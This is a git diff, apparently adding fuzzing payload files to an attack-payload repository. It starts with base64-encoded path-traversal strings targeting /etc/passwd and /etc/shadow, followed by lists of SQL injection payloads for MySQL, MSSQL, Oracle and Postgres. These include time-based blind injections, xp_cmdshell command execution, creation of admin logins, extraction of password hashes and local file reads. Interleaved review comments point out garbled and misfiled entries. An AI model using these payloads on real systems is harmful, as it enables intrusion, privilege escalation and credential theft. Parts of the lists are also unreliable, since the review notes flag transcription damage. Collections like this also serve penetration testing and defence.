+L2V0Yy9wYXNzd2Q= +L2V0Yy9wYXNzd2QlMDA= +Li4vZXRjL3Bhc3N3ZA== +Li4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vZXRjL3Bhc3N3ZA== 
+Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 
+Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA== diff --git a/SQL injection/Payloads/FUZZDB_GenericBlind.txt b/SQL injection/Payloads/FUZZDB_GenericBlind.txt new file mode 100644 index 0000000..71d2174 --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_GenericBlind.txt 
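Review bot: The JHADDIX_LFI.txt hunk carries visible transcription artefacts rather than clean list entries: the `=3D “/..” . “%2f..` line is quoted-printable residue with typographic quotes, the second entry uses Unicode ellipsis characters where the rest of the list uses plain dots, and tokens such as `dbase.php a`, `access_ log` and `error_l og` contain stray spaces while their unbroken forms already appear elsewhere in the same list. That pattern suggests the file was pasted from a rendered mail or document rather than copied from its source, so the whole list should be diffed against the upstream copy before it is relied on. The file also has no provenance line; since the filename credits jhaddix, a one-line header (or a README entry next to the file, if the consuming tool does not tolerate comment lines) naming the original source and its licence would make the attribution verifiable.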
@@ -0,0 +1,42 @@
+# from wapiti
+sleep(__TIME__)#
+1 or sleep(__TIME__)#
+" or sleep(__TIME__)#
+' or sleep(__TIME__)#
+" or sleep(__TIME__)="
+' or sleep(__TIME__)='
+1) or sleep(__TIME__)#
+") or sleep(__TIME__)="
+') or sleep(__TIME__)='
+1)) or sleep(__TIME__)#
+")) or sleep(__TIME__)="
+')) or sleep(__TIME__)='
+;waitfor delay '0:0:__TIME__'--
+);waitfor delay '0:0:__TIME__'--
+';waitfor delay '0:0:__TIME__'--
+";waitfor delay '0:0:__TIME__'--
+');waitfor delay '0:0:__TIME__'--
+");waitfor delay '0:0:__TIME__'--
+));waitfor delay '0:0:__TIME__'--
+'));waitfor delay '0:0:__TIME__'--
+"));waitfor delay '0:0:__TIME__'--
+benchmark(10000000,MD5(1))#
+1 or benchmark(10000000,MD5(1))#
+" or benchmark(10000000,MD5(1))#
+' or benchmark(10000000,MD5(1))#
+1) or benchmark(10000000,MD5(1))#
+") or benchmark(10000000,MD5(1))#
+') or benchmark(10000000,MD5(1))#
+1)) or benchmark(10000000,MD5(1))#
+")) or benchmark(10000000,MD5(1))#
+')) or benchmark(10000000,MD5(1))#
+pg_sleep(__TIME__)--
+1 or pg_sleep(__TIME__)--
+" or pg_sleep(__TIME__)--
+' or pg_sleep(__TIME__)--
+1) or pg_sleep(__TIME__)--
+") or pg_sleep(__TIME__)--
+') or pg_sleep(__TIME__)--
+1)) or pg_sleep(__TIME__)--
+")) or pg_sleep(__TIME__)--
+')) or pg_sleep(__TIME__)--
diff --git a/SQL injection/Payloads/FUZZDB_MSSQL.txt b/SQL injection/Payloads/FUZZDB_MSSQL.txt
new file mode 100644
index 0000000..98bffba
--- /dev/null
+++ b/SQL injection/Payloads/FUZZDB_MSSQL.txt
@@ -0,0 +1,17 @@
+# you will need to customize/modify some of the vaules in the queries for best effect
+'; exec master..xp_cmdshell 'ping 10.10.1.2'--
+'create user name identified by 'pass123' --
+'create user name identified by pass123 temporary tablespace temp default tablespace users;
+' ; drop table temp --
+'exec sp_addlogin 'name' , 'password' --
+' exec sp_addsrvrolemember 'name' , 'sysadmin' --
+' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
+' grant connect to name; grant resource to name; --
+' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
+' or 1=1 --
+' union (select @@version) --
+' union (select NULL, (select @@version)) --
+' union (select NULL, NULL, (select @@version)) --
+' union (select NULL, NULL, NULL, (select @@version)) --
+' union (select NULL, NULL, NULL, NULL, (select @@version)) --
+' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
diff --git a/SQL injection/Payloads/FUZZDB_MSSQLEnumeration.txt b/SQL injection/Payloads/FUZZDB_MSSQLEnumeration.txt
new file mode 100644
index 0000000..f9b53cf
--- /dev/null
+++ b/SQL injection/Payloads/FUZZDB_MSSQLEnumeration.txt
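Review bot: FUZZDB_MSSQL.txt mixes dialects under an MSSQL name: the two `create user name identified by ...` lines (the second with `temporary tablespace ... default tablespace`) are Oracle syntax and the `insert into mysql.user (...)` line addresses MySQL's grant table, none of which is T-SQL. The reverse appears in the FUZZDB_MYSQL.txt hunk on the next file, where `1 exec sp_ (or exec xp_)` is MSSQL-specific and, being prose with a parenthetical, is not a data row at all. Either file the lines under their own dialect or add a `#` comment at the top stating that the list is intentionally mixed, so that anyone filtering by file name is not misled. The first comment line also has a typo: `vaules` should read `values`.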
@@ -0,0 +1,15 @@
+# ms-sqli info disclosure payload fuzzfile
+# replace regex with your fuzzer for best results
+# run wireshark or tcpdump, look for incoming smb or icmp packets from victim
+# might need to terminate payloads with ;--
+select @@version
+select @@servernamee
+select @@microsoftversione
+select * from master..sysserverse
+select * from sysusers
+exec master..xp_cmdshell 'ipconfig+/all'
+exec master..xp_cmdshell 'net+view'
+exec master..xp_cmdshell 'net+users'
+exec master..xp_cmdshell 'ping+'
+BACKUP database master to disks='\\\\backupdb.dat'
+create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.asp'" select * from myfile"--
diff --git a/SQL injection/Payloads/FUZZDB_MYSQL.txt b/SQL injection/Payloads/FUZZDB_MYSQL.txt
new file mode 100644
index 0000000..9ada7a3
--- /dev/null
+++ b/SQL injection/Payloads/FUZZDB_MYSQL.txt
@@ -0,0 +1,6 @@
+1'1
+1 exec sp_ (or exec xp_)
+1 and 1=1
+1' and 1=(select count(*) from tablenames); --
+1 or 1=1
+1' or '1'='1
diff --git a/SQL injection/Payloads/FUZZDB_MySQL_ReadLocalFiles.txt b/SQL injection/Payloads/FUZZDB_MySQL_ReadLocalFiles.txt
new file mode 100644
index 0000000..aeb89ca
--- /dev/null
+++ b/SQL injection/Payloads/FUZZDB_MySQL_ReadLocalFiles.txt
@@ -0,0 +1,3 @@
+# mysql local file disclosure through sqli
+# fuzz interesting absolute filepath/filename into
+create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile;
diff --git a/SQL injection/Payloads/FUZZDB_MySQL_SQLi_LoginBypass.txt b/SQL injection/Payloads/FUZZDB_MySQL_SQLi_LoginBypass.txt
new file mode 100644
index 0000000..c4ba291
--- /dev/null
+++ b/SQL injection/Payloads/FUZZDB_MySQL_SQLi_LoginBypass.txt
@@ -0,0 +1,8 @@
+# regex replace as many as you can with your fuzzer for best results:
+#
+# also try to brute force a list of possible usernames, including possile admin acct names
+' OR 1=1--
+'OR '' = ' Allows authentication without a valid username.
+'--
+' union select 1, '', '' 1--
+'OR 1=1--
diff --git a/SQL injection/Payloads/FUZZDB_Oracle.txt b/SQL injection/Payloads/FUZZDB_Oracle.txt
new file mode 100644
index 0000000..2b1e6ee
--- /dev/null
+++ b/SQL injection/Payloads/FUZZDB_Oracle.txt
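Review bot: The third header comment in the FUZZDB_MySQL_SQLi_LoginBypass.txt hunk misspells "possible" as `possile`; suggest `# also try to brute force a list of possible usernames, including possible admin acct names`. The second comment line is a bare `#` with no text, which reads as an accidentally emptied line; either fill it in or drop it so the header is self-explanatory.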
@@ -0,0 +1,56 @@ +# contains statements from jbrofuzz +’ or ‘1’=’1 +' or '1'='1 +'||utl_http.request('httP://192.168.1.1/')||' +' || myappadmin.adduser('admin', 'newpass') || ' +' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE 
LIMIT=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM 
SYS.USER$) WHERE LIMIT=4)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), 
ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i + 
diff --git a/SQL injection/Payloads/FUZZDB_PostgresEnumeration.txt b/SQL injection/Payloads/FUZZDB_PostgresEnumeration.txt
new file mode 100644
index 0000000..d963527
--- /dev/null
+++ b/SQL injection/Payloads/FUZZDB_PostgresEnumeration.txt
@@ -0,0 +1,20 @@
+# info disclosure payload fuzzfile for pgsql
+select version();
+select current_database();
+select current_user;
+select session_user;
+select current_setting('log_connections');
+select current_setting('log_statement');
+select current_setting('port');
+select current_setting('password_encryption');
+select current_setting('krb_server_keyfile');
+select current_setting('virtual_host');
+select current_setting('port');
+select current_setting('config_file');
+select current_setting('hba_file');
+select current_setting('data_directory');
+select * from pg_shadow;
+select * from pg_group;
+create table myfile (input TEXT);
+copy myfile from '/etc/passwd';
+select * from myfile;copy myfile to /tmp/test;
diff --git a/SQL injection/Payloads/Generic_SQLi b/SQL injection/Payloads/Generic_SQLi
new file mode 100644
index 0000000..4a30a2e
--- /dev/null
+++ b/SQL injection/Payloads/Generic_SQLi
@@ -0,0 +1,267 @@ +)%20or%20('x'='x +%20or%201=1 +; execute immediate 'sel' || 'ect us' || 'er' +benchmark(10000000,MD5(1))# +update +";waitfor delay '0:0:__TIME__'-- +1) or pg_sleep(__TIME__)-- +||(elt(-3+5,bin(15),ord(10),hex(char(45)))) +"hi"") or (""a""=""a" +delete +like +" or sleep(__TIME__)# +pg_sleep(__TIME__)-- +*(|(objectclass=*)) +declare @q nvarchar (200) 0x730065006c00650063 ... + or 0=0 # +insert +1) or sleep(__TIME__)# +) or ('a'='a +; exec xp_regread +*| +@var select @var as var into temp end -- +1)) or benchmark(10000000,MD5(1))# +asc +(||6) +"a"" or 3=3--" +" or benchmark(10000000,MD5(1))# +# from wapiti + or 0=0 -- +1 waitfor delay '0:0:10'-- + or 'a'='a +hi or 1=1 --" +or a = a + UNION ALL SELECT +) or sleep(__TIME__)=' +)) or benchmark(10000000,MD5(1))# +hi' or 'a'='a +0 +21 % +limit + or 1=1 + or 2 > 1 +")) or benchmark(10000000,MD5(1))# +PRINT +hi') or ('a'='a + or 3=3 +));waitfor delay '0:0:__TIME__'-- +a' waitfor delay '0:0:10'-- +1;(load_file(char(47,101,116,99,47,112,97,115, ... +or%201=1 +1 or sleep(__TIME__)# +or 1=1 + and 1 in (select var from temp)-- + or '7659'='7659 + or 'text' = n'text' + -- + or 1=1 or ''=' +declare @s varchar (200) select @s = 0x73656c6 ... +exec xp +; exec master..xp_cmdshell 'ping 172.10.1.255'-- +3.10E+17 +" or pg_sleep(__TIME__)-- +x' AND email IS NULL; -- +& +admin' or ' + or 'unusual' = 'unusual' +// +truncate +1) or benchmark(10000000,MD5(1))# +\x27UNION SELECT +declare @s varchar(200) select @s = 0x77616974 ... +tz_offset +sqlvuln +"));waitfor delay '0:0:__TIME__'-- +||6 +or%201=1 -- +%2A%28%7C%28objectclass%3D%2A%29%29 +or a=a +) union select * from information_schema.tables; +PRINT @@variable +or isNULL(1/0) /* +26 % +" or "a"="a +(sqlvuln) +x' AND members.email IS NULL; -- + or 1=1-- + and 1=( if((load_file(char(110,46,101,120,11 ... +0x770061006900740066006F0072002000640065006C00 ... 
+%20'sleep%2050' +as +1)) or pg_sleep(__TIME__)-- +/**/or/**/1/**/=/**/1 + union all select @@version-- +,@variable +(sqlattempt2) + or (EXISTS) +t'exec master..xp_cmdshell 'nslookup www.googl ... +%20$(sleep%2050) +1 or benchmark(10000000,MD5(1))# +%20or%20''=' +||UTL_HTTP.REQUEST + or pg_sleep(__TIME__)-- +hi' or 'x'='x'; +") or sleep(__TIME__)=" + or 'whatever' in ('whatever') +; begin declare @var varchar(8000) set @var=' ... + union select 1,load_file('/etc/passwd'),1,1,1; +0x77616974666F722064656C61792027303A303A313027 ... +exec(@s) +) or pg_sleep(__TIME__)-- + union select + or sleep(__TIME__)# + select * from information_schema.tables-- +a' or 1=1-- +a' or 'a' = 'a +declare @s varchar(22) select @s = + or 2 between 1 and 3 + or a=a-- + or '1'='1 +| + or sleep(__TIME__)=' + or 1 --' +or 0=0 #" +having +a' +" or isNULL(1/0) /* +declare @s varchar (8000) select @s = 0x73656c ... +‘ or 1=1 -- +char%4039%41%2b%40SELECT +order by +bfilename + having 1=1-- +) or benchmark(10000000,MD5(1))# + or username like char(37); +;waitfor delay '0:0:__TIME__'-- +" or 1=1-- +x' AND userid IS NULL; -- +*/* + or 'text' > 't' + (select top 1 + or benchmark(10000000,MD5(1))# +");waitfor delay '0:0:__TIME__'-- +a' or 3=3-- + -- &password= + group by userid having 1=1-- + or ''=' +; exec master..xp_cmdshell +%20or%20x=x +select +")) or sleep(__TIME__)=" +0x730065006c0065006300740020004000400076006500 ... +hi' or 1=1 -- +") or pg_sleep(__TIME__)-- +%20or%20'x'='x + or 'something' = 'some'+'thing' +exec sp +29 % +( +ý or 1=1 -- +1 or pg_sleep(__TIME__)-- +0 or 1=1 +) or (a=a +uni/**/on sel/**/ect +replace +%27%20or%201=1 +)) or pg_sleep(__TIME__)-- +%7C +x' AND 1=(SELECT COUNT(*) FROM tabname); -- +'%20OR +; or '1'='1' +declare @q nvarchar (200) select @q = 0x770061 ... 
+1 or 1=1 +; exec ('sel' + 'ect us' + 'er') +23 OR 1=1 +/ +anything' OR 'x'='x +declare @q nvarchar (4000) select @q = +or 0=0 -- +desc +||'6 +) +1)) or sleep(__TIME__)# +or 0=0 # + select name from syscolumns where id = (sele ... +hi or a=a +*(|(mail=*)) +password:*/=1-- +distinct +);waitfor delay '0:0:__TIME__'-- +to_timestamp_tz +") or benchmark(10000000,MD5(1))# + UNION SELECT +%2A%28%7C%28mail%3D%2A%29%29 ++sqlvuln + or 1=1 /* +)) or sleep(__TIME__)=' +or 1=1 or ""= + or 1 in (select @@version)-- +sqlvuln; + union select * from users where login = char ... +x' or 1=1 or 'x'='y +28 % +‘ or 3=3 -- +@variable + or '1'='1'-- +"a"" or 1=1--" +//* +%2A%7C +" or 0=0 -- +")) or pg_sleep(__TIME__)-- +? + or 1/* +! +' + or a = a +declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) +declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) +declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) +declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) +' or 1=1 + or 1=1 -- +x' OR full_name LIKE '%Bob% +'; exec master..xp_cmdshell 'ping 172.10.1.255'-- +'%20or%20''=' +'%20or%20'x'='x +')%20or%20('x'='x +' or 0=0 -- +' or 0=0 # + or 0=0 #" +' or 1=1-- +' or '1'='1'-- +' or 1 --' +or 1=1-- +' or 1=1 or ''=' + or 1=1 or ""= +' or a=a-- + or a=a +') or ('a'='a +'hi' or 'x'='x'; +or +procedure +handler +' 